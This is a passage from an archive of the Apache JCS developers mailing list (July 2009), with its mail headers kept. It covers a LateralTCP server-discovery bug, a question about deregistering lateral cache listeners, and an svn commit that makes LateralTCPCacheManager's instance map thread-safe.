--------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 09 07:58:50 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92227 invoked from network); 9 Jul 2009 07:58:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jul 2009 07:58:50 -0000 Received: (qmail 38289 invoked by uid 500); 9 Jul 2009 07:59:00 -0000 Delivered-To: [email protected] Received: (qmail 38231 invoked by uid 500); 9 Jul 2009 07:59:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 38221 invoked by uid 99); 9 Jul 2009 07:59:00 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Jul 2009 07:59:00 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Jul 2009 07:58:50 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MOoWU-0006ow-3s for [email protected]; Thu, 09 Jul 2009 00:58:30 -0700 Message-ID: <[email protected]> Date: Thu, 9 Jul 2009 00:58:30 -0700 (PDT) From: Manuel Cruz <[email protected]> To: [email protected] Subject: Re: Third server not discovered by second server with LateralTCP In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Nabble-From: [email protected] References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Hello Dieter. We look your post in nabble's forum about "Thirds erver not discovered by second server with LateralTCP". We have the same problem but the solution you gave (synchronized ( instances ) in method getInstances() ) not work to us =20 Can you help us ? We paste cache.ccf if you can see it. # DEFAULT CACHE REGION jcs.default=3DLTCP jcs.default.cacheattributes=3Dorg.apache.jcs.engine.CompositeCacheAttribute= s jcs.default.cacheattributes.MaxObjects=3D1000 jcs.default.cacheattributes.MemoryCacheName=3Dorg.apache.jcs.engine.memory.= lru.LRUMemoryCache jcs.default.elementattributes.IsEternal=3Dtrue #jcs.default.elementattributes.MaxLifeSeconds=3D21600 jcs.default.cacheattributes.UseMemoryShrinker=3Dfalse jcs.default.cacheattributes.ShrinkerIntervalSeconds=3D60 jcs.default.cacheattributes.MaxMemoryIdleTimeSeconds=3D360000 jcs.default.elementattributes.IsSpool=3Dfalse jcs.default.elementattributes.IsRemote=3Dfalse jcs.default.elementattributes.IsLateral=3Dtrue # PRE-DEFINED CACHE REGIONS jcs.region.infocorCacheLateral=3DLTCP jcs.region.infocorCacheLateral.cacheattributes=3Dorg.apache.jcs.engine.Comp= ositeCacheAttributes jcs.region.infocorCacheLateral.cacheattributes.MaxObjects=3D1000 jcs.region.infocorCacheLateral.cacheattributes.MemoryCacheName=3Dorg.apache= .jcs.engine.memory.lru.LRUMemoryCache jcs.region.infocorCacheLateral.elementattributes.IsEternal=3Dtrue #jcs.region.infocorCacheLateral.elementattributes.MaxLifeSeconds=3D21600 jcs.region.infocorCacheLateral.cacheattributes.UseMemoryShrinker=3Dfalse jcs.region.infocorCacheLateral.cacheattributes.ShrinkerIntervalSeconds=3D60 jcs.region.infocorCacheLateral.cacheattributes.MaxMemoryIdleTimeSeconds=3D3= 60000 jcs.region.infocorCacheLateral.elementattributes.IsSpool=3Dfalse jcs.region.infocorCacheLateral.elementattributes.IsRemote=3Dfalse jcs.region.infocorCacheLateral.elementattributes.IsLateral=3Dtrue # AVAILABLE AUXILIARY CACHES jcs.auxiliary.LTCP=3Dorg.apache.jcs.auxiliary.lateral.socket.tcp.LateralTCP= CacheFactory jcs.auxiliary.LTCP.attributes=3Dorg.apache.jcs.auxiliary.lateral.socket.tcp= .TCPLateralCacheAttributes jcs.auxiliary.LTCP.attributes.TransmissionTypeName=3DTCP jcs.auxiliary.LTCP.attributes.TcpServers=3D161.129.204.104:41000,192.168.196:= 41000 jcs.auxiliary.LTCP.attributes.TcpListenerPort=3D41100 jcs.auxiliary.LTCP.attributes.UdpDiscoveryEnabled=3Dfalse jcs.auxiliary.LTCP.attributes.Receive=3Dtrue jcs.auxiliary.LTCP.attributes.AllowGet=3Dtrue jcs.auxiliary.LTCP.attributes.IssueRemoveOnPut=3Dtrue jcs.auxiliary.LTCP.attributes.FilterRemoveByHashCode=3Dfalse jcs.auxiliary.LTCP.attributes.PutOnlyMode=3Dfalse Regards and thank you =20 Dieter Laufkoetter wrote: >=20 > Hello, >=20 > we use an net with 3 servers and use the LateralTCP protocol. > We don=C2=B4t use musticast (jcs.auxiliary.LTCP.attributes.UdpDiscoveryEn= abled > =3D false). > Each server is configured the other two servers with > jcs.auxiliary.LTCP.attributes.TcpServers. >=20 > At first we start server 1. > Server 1 tries to connect to server 2 and 3. >=20 > Then we start server 2. > Server 2 connects to server 1 but does not try to connect to server 3. > Server 1 connects to server 2 >=20 > Then we start server 3. > Server 3 connects to server 1 and 2. > Server 1 connects to server 3. >=20 > The error: > Server 2 never tries to connect to server 3 and so the puts of server 2 > never reach server 3. >=20 > This error occurs with 3 servers on 3 nodes and also with 3 servers on th= e > same node. >=20 >=20 > we found a solution for the problem: > In the class > org.apache.jcs.auxiliary.lateral.socket.tcp.LateralTCPCacheManager the Ma= p > "instances" is synchronised at getInstance() but not at getInstances(). S= o > an inconsistent value of instances may be got by call of getInstances(). > The following change of getInstances() fixes the problem: >=20 > public Map getInstances() > { > synchronized ( instances ) { > return instances; > } > } >=20 > We use new and fast machines, maybe that older and slower machines does > not produce this synchronisation error. >=20 > best regards, >=20 > Dieter >=20 >=20 >=20 :-((:-(( --=20 View this message in context: http://www.nabble.com/Third-server-not-discov= ered-by-second-server-with-LateralTCP-tp13855881p24405813.html Sent from the JCS - Dev mailing list [email protected]. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 09 13:31:12 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65518 invoked from network); 9 Jul 2009 13:31:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jul 2009 13:31:12 -0000 Received: (qmail 9505 invoked by uid 500); 9 Jul 2009 13:31:22 -0000 Delivered-To: [email protected] Received: (qmail 9485 invoked by uid 500); 9 Jul 2009 13:31:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 9475 invoked by uid 99); 9 Jul 2009 13:31:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Jul 2009 13:31:22 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web38707.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 09 Jul 2009 13:31:10 +0000 Received: (qmail 66805 invoked by uid 60001); 9 Jul 2009 13:30:48 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1247146248; bh=Mab71UtiQP+fRmFEjq2tKbKvRlC5ZKpZIrN56KsmXXw=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=iJbEaYYhVaYhlYvH5ENPb2INiC4cZ2LxvhCrVLNqsA9V5S3Bj81nW81ptOuJWxdCyEss35trrkTdf1g/gUCANXDJ0L6Q60SH9KTpCwQDA7y53E3cse20Haetqpe/5iT+vCNBf/1hgMvSeoH9SurSwNklLaGxuQ5DYZY5Owtox5g= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=JkjeLVzL+ssDYLqcSTU5jRYrxxPMioHvFajiYfe0smcL1jKHAReh6cgbDye4fnWiAMOWN7aypX6dty+K0B1bqd/TxHYULKMk5zALvmxK+W6kRVhiWcKIRiMPvWMFegC1ozOwgO8ML2zkVhrI9MUGuD2xajr7iMnZ6KVJ96NE+zA=; Message-ID: <[email protected]> X-YMail-OSG: My58HCQVM1kqJC23bZ9G59293JYIwddT1YRXWMd0.8avc3LqVp6tz0Ia.DlgvX91C9rEFcEq5SVNGZN1J9qLSLUJNn7qhnXXMmI78PkpU_IRGJMcQJchKomvuCTtcjRQdWactCqvbvbPlJPW3nZyNLRENm5gPSuM8LvXUJYKfFZNa.JtBnGhiRrp.KaheaBrdYFAOE9jVCL6i6n5pb.pE.rFFZDDYffn8kZ_e3MiNs9tpqMpBnjCO2Hg_l7vXIeTv.Qj8P5tNJ5t4SqdxqP4xlCQ3tXhP5h4_w.AdJZB360E5EGOtpe3voGb0qs6.7pj_8JA05dP32A2khOm Received: from [161.129.204.104] by web38707.mail.mud.yahoo.com via HTTP; Thu, 09 Jul 2009 06:30:48 PDT X-Mailer: YahooMailClassic/5.4.17 YahooMailWebService/0.7.289.15 Date: Thu, 9 Jul 2009 06:30:48 -0700 (PDT) From: Aaron Smuts <[email protected]> Subject: Re: Third server not discovered by second server with LateralTCP To: JCS Developers List <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org I didn't know about the 3rd server problem. The issue should be added to J= IRA=0A=0Ahttps://issues.apache.org/jira/secure/BrowseProject.jspa=0A=0AI th= ink the problem was in the getInstance method, not the getInstances. I fix= ed it. I'll check it in and cut a temp build soon.=0A=0AIn any case, that = code needs to change. I'm making it so that you can have multiple instance= s of JCS. There are only a few things left that assume that JCS is a singl= eton. . . .=0A=0AAaron=0A=0A=0A=0A--- On Thu, 7/9/09, Manuel Cruz <manuelcr= [email protected]> wrote:=0A=0A> From: Manuel Cruz <[email protected]>= =0A> Subject: Re: Third server not discovered by second server with Lateral= TCP=0A> To: [email protected]=0A> Date: Thursday, July 9, 2009, 12= :58 AM=0A> =0A> Hello Dieter.=0A> =0A> =A0 We look your post in nabble's fo= rum about "Thirds=0A> erver not discovered by=0A> second server with Latera= lTCP". We have the same problem=0A> but the solution=0A> you gave (synchron= ized ( instances ) in method=0A> getInstances() ) not work to=0A> us=A0=A0= =A0=0A> =0A> =A0 Can you help us ?=A0 =A0 We paste cache.ccf if=0A> you can= see it.=0A> =0A> # DEFAULT CACHE REGION=0A> =0A> jcs.default=3DLTCP=0A> jc= s.default.cacheattributes=3Dorg.apache.jcs.engine.CompositeCacheAttributes= =0A> jcs.default.cacheattributes.MaxObjects=3D1000=0A> jcs.default.cacheatt= ributes.MemoryCacheName=3Dorg.apache.jcs.engine.memory.lru.LRUMemoryCache= =0A> jcs.default.elementattributes.IsEternal=3Dtrue=0A> #jcs.default.elemen= tattributes.MaxLifeSeconds=3D21600=0A> jcs.default.cacheattributes.UseMemor= yShrinker=3Dfalse=0A> jcs.default.cacheattributes.ShrinkerIntervalSeconds= =3D60=0A> jcs.default.cacheattributes.MaxMemoryIdleTimeSeconds=3D360000=0A>= jcs.default.elementattributes.IsSpool=3Dfalse=0A> jcs.default.elementattri= butes.IsRemote=3Dfalse=0A> jcs.default.elementattributes.IsLateral=3Dtrue= =0A> =0A> =0A> # PRE-DEFINED CACHE REGIONS=0A> =0A> jcs.region.infocorCache= Lateral=3DLTCP=0A> jcs.region.infocorCacheLateral.cacheattributes=3Dorg.apa= che.jcs.engine.CompositeCacheAttributes=0A> jcs.region.infocorCacheLateral.= cacheattributes.MaxObjects=3D1000=0A> jcs.region.infocorCacheLateral.cachea= ttributes.MemoryCacheName=3Dorg.apache.jcs.engine.memory.lru.LRUMemoryCache= =0A> jcs.region.infocorCacheLateral.elementattributes.IsEternal=3Dtrue=0A> = #jcs.region.infocorCacheLateral.elementattributes.MaxLifeSeconds=3D21600=0A= > jcs.region.infocorCacheLateral.cacheattributes.UseMemoryShrinker=3Dfalse= =0A> jcs.region.infocorCacheLateral.cacheattributes.ShrinkerIntervalSeconds= =3D60=0A> jcs.region.infocorCacheLateral.cacheattributes.MaxMemoryIdleTimeS= econds=3D360000=0A> jcs.region.infocorCacheLateral.elementattributes.IsSpoo= l=3Dfalse=0A> jcs.region.infocorCacheLateral.elementattributes.IsRemote=3Df= alse=0A> jcs.region.infocorCacheLateral.elementattributes.IsLateral=3Dtrue= =0A> =0A> # AVAILABLE AUXILIARY CACHES=0A> =0A> jcs.auxiliary.LTCP=3Dorg.ap= ache.jcs.auxiliary.lateral.socket.tcp.LateralTCPCacheFactory=0A> jcs.auxili= ary.LTCP.attributes=3Dorg.apache.jcs.auxiliary.lateral.socket.tcp.TCPLatera= lCacheAttributes=0A> jcs.auxiliary.LTCP.attributes.TransmissionTypeName=3DT= CP=0A> jcs.auxiliary.LTCP.attributes.TcpServers=3D161.129.204.104:41000,192.1= 68.196:41000=0A> jcs.auxiliary.LTCP.attributes.TcpListenerPort=3D41100=0A> = jcs.auxiliary.LTCP.attributes.UdpDiscoveryEnabled=3Dfalse=0A> jcs.auxiliary= .LTCP.attributes.Receive=3Dtrue=0A> jcs.auxiliary.LTCP.attributes.AllowGet= =3Dtrue=0A> jcs.auxiliary.LTCP.attributes.IssueRemoveOnPut=3Dtrue=0A> jcs.a= uxiliary.LTCP.attributes.FilterRemoveByHashCode=3Dfalse=0A> jcs.auxiliary.L= TCP.attributes.PutOnlyMode=3Dfalse=0A> =0A> =0A> =A0=A0=A0Regards and thank= you=A0 =0A> =0A> =0A> =0A> =0A> =0A> =0A> =0A> =0A> =0A> Dieter Laufkoette= r wrote:=0A> > =0A> > Hello,=0A> > =0A> > we use an net with 3 servers and = use the LateralTCP=0A> protocol.=0A> > We don=B4t use musticast=0A> (jcs.au= xiliary.LTCP.attributes.UdpDiscoveryEnabled=0A> > =3D false).=0A> > Each se= rver is configured the other two servers with=0A> > jcs.auxiliary.LTCP.attr= ibutes.TcpServers.=0A> > =0A> > At first we start server 1.=0A> > Server 1 = tries to connect to server 2 and 3.=0A> > =0A> > Then we start server 2.=0A= > > Server 2 connects to server 1 but does not try to=0A> connect to server= 3.=0A> > Server 1 connects to server 2=0A> > =0A> > Then we start server 3= .=0A> > Server 3 connects to server 1 and 2.=0A> > Server 1 connects to ser= ver 3.=0A> > =0A> > The error:=0A> > Server 2 never tries to connect to ser= ver 3 and so the=0A> puts of server 2=0A> > never reach server 3.=0A> > =0A= > > This error occurs with 3 servers on 3 nodes and also=0A> with 3 servers= on the=0A> > same node.=0A> > =0A> > =0A> > we found a solution for the pr= oblem:=0A> > In the class=0A> >=0A> org.apache.jcs.auxiliary.lateral.socket= .tcp.LateralTCPCacheManager=0A> the Map=0A> > "instances" is synchronised a= t getInstance() but not=0A> at getInstances(). So=0A> > an inconsistent val= ue of instances may be got by call=0A> of getInstances().=0A> > The followi= ng change of getInstances() fixes the=0A> problem:=0A> > =0A> >=A0 =A0=A0= =A0public Map getInstances()=0A> >=A0 =A0=A0=A0{=0A> >=A0 =A0 =A0 =A0=A0=A0= synchronized (=0A> instances ) {=0A> >=A0 =A0 =A0 =A0 =A0=0A> =A0=A0=A0retu= rn instances;=0A> >=A0 =A0 =A0 =A0=A0=A0}=0A> >=A0 =A0=A0=A0}=0A> > =0A> > = We use new and fast machines, maybe that older and=0A> slower machines does= =0A> > not produce this synchronisation error.=0A> > =0A> > best regards,= =0A> > =0A> > Dieter=0A> > =0A> > =0A> > =0A> :-((:-((=0A> -- =0A> View thi= s message in context: http://www.nabble.com/Third-server-not-discovered-by-= second-server-with-LateralTCP-tp13855881p24405813.html=0A> Sent from the JC= S - Dev mailing list archive at=0A> Nabble.com.=0A> =0A> =0A> -------------= --------------------------------------------------------=0A> To unsubscribe= , e-mail: [email protected]=0A> For additional command= s, e-mail: [email protected]=0A> =0A> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 09 13:34:03 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72326 invoked from network); 9 Jul 2009 13:34:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jul 2009 13:34:03 -0000 Received: (qmail 16433 invoked by uid 500); 9 Jul 2009 13:34:13 -0000 Delivered-To: [email protected] Received: (qmail 16391 invoked by uid 500); 9 Jul 2009 13:34:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 16381 invoked by uid 99); 9 Jul 2009 13:34:13 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Jul 2009 13:34:13 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web38703.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 09 Jul 2009 13:34:02 +0000 Received: (qmail 79321 invoked by uid 60001); 9 Jul 2009 13:33:41 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1247146421; bh=OU6lxUjxDhmyuTlcXoUMefX5xsXJgYAVqPWL0cJUcfE=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=EbH2otUu39t0MjdDBn97JhMaIGZgztlVQRMaKEU/ZazgpEeV7oPV5UF6e7yjdM+Dcq+R06aYmSSnevldCcIfykP61r8YP6BjwW6WVmeKcCHP8PVESU2zFbTqy7L+5v19WaT1PQzCEA4/mWZ/nVoEhdulykvlSu4JAm1K2+Wk7Is= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=CAgcjVGVbM9TpfD4Rj5wdSWWJRSCqjkY0rhwEcOVgAMONxhBT2l/gYL33dcEiPbWHSuk94Ta45+nl9R3QQIVXgvkt4t9l+ZOVbcdExcGR7W9klpb7wFBxjG0mmP+Luev/RAZsLLQlyVSLIpWgsn7B2pmwF989GQjCWiKw4XUgnU=; Message-ID: <[email protected]> X-YMail-OSG: tuRrMYMVM1m6lBcPhw9Y5.Gj0ITFDGBA9k7_mgQz4xWNHoV5kwdqejPw6msn_fBSYpSeXFXwXB8TOgQyTDafOX9tk6_aB.plqoudNm6AaNQIRBljOz.yyx_7rZjzf_fh_mJWVnpTM5zxvtzKbaIKAXSB7l_y8xwVEVctryxwLu1fz.7qH9X7qKDKISKDRnT0gS1hUG9sUoKp2NYo6EJHmzs3vfDkOiGeA4AEdxMhyZ23xRpweDQ_zbBVi7OdXRqHFuU4P579Nx.y8A6bns54jm9onITBM9cwM.MTqoR24iEqJSz2U3Mm2wlxlu9WcI4OymiQWgO7KVuGVZFWcBU4nw-- Received: from [161.129.204.104] by web38703.mail.mud.yahoo.com via HTTP; Thu, 09 Jul 2009 06:33:41 PDT X-Mailer: YahooMailClassic/5.4.17 YahooMailWebService/0.7.289.15 Date: Thu, 9 Jul 2009 06:33:41 -0700 (PDT) From: Aaron Smuts <[email protected]> Subject: Re: How to deregister Lateral Cache listeners in cluster? To: JCS Developers List <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org The discovery system needs to deregister after a period of inactivity. =0A= =0AThe remote cache client queues items during the reconnect period. It wi= ll send them once reconnected. This isn't as easy to do in the lateral. = =0A=0AAaron=0A=0A--- On Mon, 7/6/09, Andrei Povodyrev <povodyrev@nodalexcha= nge.com> wrote:=0A=0A> From: Andrei Povodyrev <[email protected]>= =0A> Subject: How to deregister Lateral Cache listeners in cluster?=0A> To:= [email protected]=0A> Date: Monday, July 6, 2009, 11:10 PM=0A> = =0A> =0A> =0A> I am using Lateral Cache with Lateral Cache with UDP=0A> dis= covery. When a node=0A> in cluster goes down the other nodes do not discard= their=0A> senders=0A> (LateralTCPSender) for the node. Is there way to rem= ove=0A> them?=0A> Calling CompositeCacheManager.shutDown() on the node does= =0A> not help=0A> =0A> I am wondering why this behavior was programmed this= way.=0A> Would it be better=0A> to recreate the senders/listeners when the= node again joins=0A> the cluster via=0A> UDP discovery?=0A> =0A> The curre= nt implementation presents me with a risk of=0A> losing cache events as=0A>= the object stream oos in LateralTCPSender is closed anyway=0A> and first a= ttempt=0A> to send fails (EVEN when the node is back).=0A> After failure is= detected the sender is recreated by=0A> LateralCacheMonitor=0A> which=0A> = =A0 *operates in a failure driven mode. That is,=0A> * it goes into a wait= state until there is an error. Upon=0A> the notification=0A> of a=0A> * c= onnection error, the monitor changes to operate in a=0A> time driven mode.= =0A> That=0A> * is, it attempts to recover the connections on a periodic= =0A> basis. When all=0A> * failed connections are restored, it changes bac= k to the=0A> failure driven=0A> mode=0A> =0A> All consecutive sends will be= fine but the first one will=0A> not get through. I=0A> consider this to be= a SEVERE case.=0A> =0A> Is there any trick I missed?=0A> =0A> Thank you ve= ry much for your help=0A> -- =0A> View this message in context: http://www.= nabble.com/How-to-deregister-Lateral-Cache-listeners-in-cluster--tp24367699= p24367699.html=0A> Sent from the JCS - Dev mailing list archive at=0A> Nabb= le.com.=0A> =0A> =0A> -----------------------------------------------------= ----------------=0A> To unsubscribe, e-mail: [email protected]= ache.org=0A> For additional commands, e-mail: [email protected]= rg=0A> =0A> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 09 13:39:16 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82442 invoked from network); 9 Jul 2009 13:39:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jul 2009 13:39:15 -0000 Received: (qmail 19848 invoked by uid 500); 9 Jul 2009 13:39:25 -0000 Delivered-To: [email protected] Received: (qmail 19808 invoked by uid 500); 9 Jul 2009 13:39:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 19798 invoked by uid 500); 9 Jul 2009 13:39:25 -0000 Delivered-To: [email protected] Received: (qmail 19795 invoked by uid 500); 9 Jul 2009 13:39:25 -0000 Delivered-To: [email protected] Received: (qmail 19792 invoked by uid 99); 9 Jul 2009 13:39:25 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Jul 2009 13:39:25 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Jul 2009 13:39:17 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DDFBF2388898; Thu, 9 Jul 2009 13:38:56 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r792552 - in /jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp: LateralTCPCacheManager.java discovery/UDPDiscoveryReceiver.java Date: Thu, 09 Jul 2009 13:38:56 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 9 13:38:56 2009 New Revision: 792552 URL: http://svn.apache.org/viewvc?rev=792552&view=rev Log: Fixing potential thread safety issue on the getInstance method in the lateral tcp cache. Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java?rev=792552&r1=792551&r2=792552&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java Thu Jul 9 13:38:56 2009 @@ -20,6 +20,7 @@ */ import java.io.IOException; +import java.util.Collections; import java.util.HashMap; import java.util.Map; @@ -66,7 +67,7 @@ private static LateralCacheMonitor monitor; /** Address to instance map. */ - protected static Map instances = new HashMap(); + protected static Map instances = Collections.synchronizedMap( new HashMap() ); /** ITCPLateralCacheAttributes */ protected ITCPLateralCacheAttributes lca; @@ -101,9 +102,9 @@ ICacheEventLogger cacheEventLogger, IElementSerializer elementSerializer ) { - LateralTCPCacheManager ins = (LateralTCPCacheManager) instances.get( lca.toString() ); synchronized ( instances ) { + LateralTCPCacheManager ins = (LateralTCPCacheManager) instances.get( lca.toString() ); if ( ins == null ) { log.info( "Instance for [" + lca.toString() + "] is null, creating" ); @@ -114,12 +115,13 @@ ins = new LateralTCPCacheManager( lca, cacheMgr, cacheEventLogger, elementSerializer ); instances.put( lca.toString(), ins ); } + + createMonitor( ins ); } - createMonitor( ins ); - } - ins.clients++; + ins.clients++; - return ins; + return ins; + } } /** Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java?rev=792552&r1=792551&r2=792552&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java Thu Jul 9 13:38:56 2009 @@ -71,7 +71,7 @@ /** number of messages received. For debugging and testing. */ private int cnt = 0; - /** Service to get cache names and hande request broadcasts */ + /** Service to get cache names and handle request broadcasts */ protected UDPDiscoveryService service = null; /** Address */ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jul 13 11:03:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20617 invoked from network); 13 Jul 2009 11:03:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Jul 2009 11:03:29 -0000 Received: (qmail 98377 invoked by uid 500); 13 Jul 2009 11:03:38 -0000 Delivered-To: [email protected] Received: (qmail 98315 invoked by uid 500); 13 Jul 2009 11:03:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 98305 invoked by uid 99); 13 Jul 2009 11:03:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 13 Jul 2009 11:03:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 13 Jul 2009 11:03:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DEF8A234C056 for <[email protected]>; Mon, 13 Jul 2009 04:03:14 -0700 (PDT) Message-ID: <294070204.1247482994912.JavaMail.jira@brutus> Date: Mon, 13 Jul 2009 04:03:14 -0700 (PDT) From: "rushi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (JCS-61) Failed to delete report.data file MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 